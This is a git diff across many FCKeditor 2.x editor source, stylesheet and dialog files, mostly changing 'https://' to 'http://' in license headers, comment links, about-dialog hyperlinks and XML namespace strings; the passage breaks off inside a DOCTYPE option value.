Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fcktablehandler_ie.js b/admin/FCKeditor/editor/_source/internals/fcktablehandler_ie.js index 4896909..05d44c3 100755 --- a/admin/FCKeditor/editor/_source/internals/fcktablehandler_ie.js +++ b/admin/FCKeditor/editor/_source/internals/fcktablehandler_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fcktoolbaritems.js b/admin/FCKeditor/editor/_source/internals/fcktoolbaritems.js index 14b5698..689dff7 100755 --- a/admin/FCKeditor/editor/_source/internals/fcktoolbaritems.js +++ b/admin/FCKeditor/editor/_source/internals/fcktoolbaritems.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fcktoolbarset.js b/admin/FCKeditor/editor/_source/internals/fcktoolbarset.js index d031b67..07a8a73 100755 --- a/admin/FCKeditor/editor/_source/internals/fcktoolbarset.js +++ b/admin/FCKeditor/editor/_source/internals/fcktoolbarset.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fcktools.js b/admin/FCKeditor/editor/_source/internals/fcktools.js index 30e7448..0fbc76a 100755 --- a/admin/FCKeditor/editor/_source/internals/fcktools.js +++ b/admin/FCKeditor/editor/_source/internals/fcktools.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fcktools_gecko.js b/admin/FCKeditor/editor/_source/internals/fcktools_gecko.js index 1c300bc..9b72e8f 100755 --- a/admin/FCKeditor/editor/_source/internals/fcktools_gecko.js +++ b/admin/FCKeditor/editor/_source/internals/fcktools_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fcktools_ie.js b/admin/FCKeditor/editor/_source/internals/fcktools_ie.js index 4bf9490..60ca4ce 100755 --- a/admin/FCKeditor/editor/_source/internals/fcktools_ie.js +++ b/admin/FCKeditor/editor/_source/internals/fcktools_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckundo_gecko.js b/admin/FCKeditor/editor/_source/internals/fckundo_gecko.js index 8d777bc..1a06c64 100755 --- a/admin/FCKeditor/editor/_source/internals/fckundo_gecko.js +++ b/admin/FCKeditor/editor/_source/internals/fckundo_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckundo_ie.js b/admin/FCKeditor/editor/_source/internals/fckundo_ie.js index f17e56b..832d698 100755 --- a/admin/FCKeditor/editor/_source/internals/fckundo_ie.js +++ b/admin/FCKeditor/editor/_source/internals/fckundo_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckurlparams.js b/admin/FCKeditor/editor/_source/internals/fckurlparams.js index 32043a1..8bfe252 100755 --- a/admin/FCKeditor/editor/_source/internals/fckurlparams.js +++ b/admin/FCKeditor/editor/_source/internals/fckurlparams.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckxhtml.js b/admin/FCKeditor/editor/_source/internals/fckxhtml.js index 30fb9f0..643434b 100755 --- a/admin/FCKeditor/editor/_source/internals/fckxhtml.js +++ b/admin/FCKeditor/editor/_source/internals/fckxhtml.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckxhtml_gecko.js b/admin/FCKeditor/editor/_source/internals/fckxhtml_gecko.js index 66f334c..9b3ba0e 100755 --- a/admin/FCKeditor/editor/_source/internals/fckxhtml_gecko.js +++ b/admin/FCKeditor/editor/_source/internals/fckxhtml_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckxhtml_ie.js b/admin/FCKeditor/editor/_source/internals/fckxhtml_ie.js index 3d31c82..3cc3fdf 100755 --- a/admin/FCKeditor/editor/_source/internals/fckxhtml_ie.js +++ b/admin/FCKeditor/editor/_source/internals/fckxhtml_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/_source/internals/fckxhtmlentities.js b/admin/FCKeditor/editor/_source/internals/fckxhtmlentities.js index 1cea3fb..cf86679 100755 --- a/admin/FCKeditor/editor/_source/internals/fckxhtmlentities.js +++ b/admin/FCKeditor/editor/_source/internals/fckxhtmlentities.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/css/fck_editorarea.css b/admin/FCKeditor/editor/css/fck_editorarea.css index 6e62403..9bbfee8 100755 --- a/admin/FCKeditor/editor/css/fck_editorarea.css +++ b/admin/FCKeditor/editor/css/fck_editorarea.css @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/css/fck_internal.css b/admin/FCKeditor/editor/css/fck_internal.css index 7c5c71b..ed77dd4 100755 --- a/admin/FCKeditor/editor/css/fck_internal.css +++ b/admin/FCKeditor/editor/css/fck_internal.css @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/css/fck_showtableborders_gecko.css b/admin/FCKeditor/editor/css/fck_showtableborders_gecko.css index e14bf82..dfc8d58 100755 --- a/admin/FCKeditor/editor/css/fck_showtableborders_gecko.css +++ b/admin/FCKeditor/editor/css/fck_showtableborders_gecko.css @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/common/fck_dialog_common.css b/admin/FCKeditor/editor/dialog/common/fck_dialog_common.css index 55d5198..93ea367 100755 --- a/admin/FCKeditor/editor/dialog/common/fck_dialog_common.css +++ b/admin/FCKeditor/editor/dialog/common/fck_dialog_common.css @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/common/fck_dialog_common.js b/admin/FCKeditor/editor/dialog/common/fck_dialog_common.js index dc42f7b..d52e46c 100755 --- a/admin/FCKeditor/editor/dialog/common/fck_dialog_common.js +++ b/admin/FCKeditor/editor/dialog/common/fck_dialog_common.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -129,7 +129,7 @@ function OpenFileBrowser( url, width, height ) { // The following change has been made otherwise IE will open the file // browser on a different server session (on some cases): - // https://support.microsoft.com/default.aspx?scid=kb;en-us;831678 + // http://support.microsoft.com/default.aspx?scid=kb;en-us;831678 // by Simone Chiaretta. var oWindow = oEditor.window.open( url, 'FCKBrowseWindow', sOptions ) ; diff --git a/admin/FCKeditor/editor/dialog/common/moz-bindings.xml b/admin/FCKeditor/editor/dialog/common/moz-bindings.xml index e9a0f88..a457577 100755 --- a/admin/FCKeditor/editor/dialog/common/moz-bindings.xml +++ b/admin/FCKeditor/editor/dialog/common/moz-bindings.xml @@ -1,5 +1,5 @@ <?xml version="1.0" encoding="utf-8" ?> -<bindings xmlns="https://www.mozilla.org/xbl"> +<bindings xmlns="http://www.mozilla.org/xbl"> <binding id="numericfield"> <implementation> <constructor> diff --git a/admin/FCKeditor/editor/dialog/fck_about.html b/admin/FCKeditor/editor/dialog/fck_about.html index 25e0b07..bfaaaf4 100755 --- a/admin/FCKeditor/editor/dialog/fck_about.html +++ b/admin/FCKeditor/editor/dialog/fck_about.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * "About" dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -89,13 +89,13 @@ window.onload = function() <br /> <span style="font-size: 14px" dir="ltr"> <br /> - <b><a href="https://www.fckeditor.net/?about" target="_blank" title="Visit the FCKeditor web site"> + <b><a href="http://www.fckeditor.net/?about" target="_blank" title="Visit the FCKeditor web site"> Support <b>Open Source</b> Software</a></b> </span> <br /> <br /> <br /> - <span fcklang="DlgAboutInfo">For further information go to</span> <a href="https://www.fckeditor.net/?About" - target="_blank">https://www.fckeditor.net/</a>. + <span fcklang="DlgAboutInfo">For further information go to</span> <a href="http://www.fckeditor.net/?About" + target="_blank">http://www.fckeditor.net/</a>. <br /> Copyright © 2003-2007 <a href="#" onclick="SendEMail();">Frederico Caldeira Knabben</a> </td> @@ -115,15 +115,15 @@ window.onload = function() <ul> <li style="margin-bottom:15px"> <b>GNU General Public License</b> Version 2 or later (the "GPL")<br /> - <a href="https://www.gnu.org/licenses/gpl.html" target="_blank">https://www.gnu.org/licenses/gpl.html</a> + <a href="http://www.gnu.org/licenses/gpl.html" target="_blank">http://www.gnu.org/licenses/gpl.html</a> </li> <li style="margin-bottom:15px"> <b>GNU Lesser General Public License</b> Version 2.1 or later (the "LGPL")<br /> - <a href="https://www.gnu.org/licenses/lgpl.html" target="_blank">https://www.gnu.org/licenses/lgpl.html</a> + <a href="http://www.gnu.org/licenses/lgpl.html" target="_blank">http://www.gnu.org/licenses/lgpl.html</a> </li> <li> <b>Mozilla Public License</b> Version 1.1 or later (the "MPL")<br /> - <a href="https://www.mozilla.org/MPL/MPL-1.1.html" target="_blank">https://www.mozilla.org/MPL/MPL-1.1.html</a> + <a href="http://www.mozilla.org/MPL/MPL-1.1.html" target="_blank">http://www.mozilla.org/MPL/MPL-1.1.html</a> </li> </ul> </div> diff --git a/admin/FCKeditor/editor/dialog/fck_anchor.html b/admin/FCKeditor/editor/dialog/fck_anchor.html index 0515022..3d30b12 100755 --- a/admin/FCKeditor/editor/dialog/fck_anchor.html +++ b/admin/FCKeditor/editor/dialog/fck_anchor.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -97,7 +97,7 @@ function Ok() { ReadjustLinksToAnchor( oAnchor.name, sNewName ); - // Buggy explorer, bad bad browser. https://alt-tag.com/blog/archives/2006/02/ie-dom-bugs/ + // Buggy explorer, bad bad browser. http://alt-tag.com/blog/archives/2006/02/ie-dom-bugs/ // Instead of just replacing the .name for the existing anchor (in order to preserve the content), we must remove the .name // and assign .name, although it won't appear until it's specially processed in fckxhtml.js diff --git a/admin/FCKeditor/editor/dialog/fck_button.html b/admin/FCKeditor/editor/dialog/fck_button.html index 453b612..89b6ab7 100755 --- a/admin/FCKeditor/editor/dialog/fck_button.html +++ b/admin/FCKeditor/editor/dialog/fck_button.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Button dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Button Properties</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_checkbox.html b/admin/FCKeditor/editor/dialog/fck_checkbox.html index f683f95..03eff74 100755 --- a/admin/FCKeditor/editor/dialog/fck_checkbox.html +++ b/admin/FCKeditor/editor/dialog/fck_checkbox.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_colorselector.html b/admin/FCKeditor/editor/dialog/fck_colorselector.html index f919383..8d82059 100755 --- a/admin/FCKeditor/editor/dialog/fck_colorselector.html +++ b/admin/FCKeditor/editor/dialog/fck_colorselector.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_docprops.html b/admin/FCKeditor/editor/dialog/fck_docprops.html index ebd1194..6a647c0 100755 --- a/admin/FCKeditor/editor/dialog/fck_docprops.html +++ b/admin/FCKeditor/editor/dialog/fck_docprops.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Link dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -284,7 +284,7 @@ function Ok() FCK.XmlDeclaration = '<?xml version="1.0" encoding="' + sCharSet + '"?>' ; - SetAttribute( oHTML, 'xmlns', 'https://www.w3.org/1999/xhtml' ) ; + SetAttribute( oHTML, 'xmlns', 'http://www.w3.org/1999/xhtml' ) ; } else { @@ -460,17 +460,17 @@ function SetUrl( url ) <option value="" selected="selected"></option> <option value='<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">'>HTML 4.01 Transitional</option> - <option value='<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" 